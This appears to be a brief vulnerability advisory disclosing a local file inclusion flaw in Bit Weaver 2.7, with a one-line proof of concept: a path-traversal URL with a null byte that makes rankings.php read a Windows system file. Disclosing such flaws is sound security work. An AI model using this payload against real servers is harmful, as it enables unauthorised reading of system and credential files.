21 lines
No EOL
793 B
Text
21 lines
No EOL
793 B
Text
------------------------------------------------------------------------
|
|
Software................Bit Weaver 2.7
|
|
Vulnerability...........Local File Inclusion
|
|
Download................http://www.bitweaver.org/
|
|
Release Date............7/1/2010
|
|
Tested On...............Windows Vista + XAMPP
|
|
------------------------------------------------------------------------
|
|
Author..................John Leitch
|
|
Site....................http://cross-site-scripting.blogspot.com/
|
|
Email...................john.leitch5@gmail.com
|
|
------------------------------------------------------------------------
|
|
|
|
--Description--
|
|
|
|
A local file inclusion vulnerability in Bit Weaver 2.7 can be
|
|
exploited to include arbitrary files.
|
|
|
|
|
|
--PoC--
|
|
|
|
http://server/wiki/rankings.php?style=../../../../../../../../windows/system.ini%00 |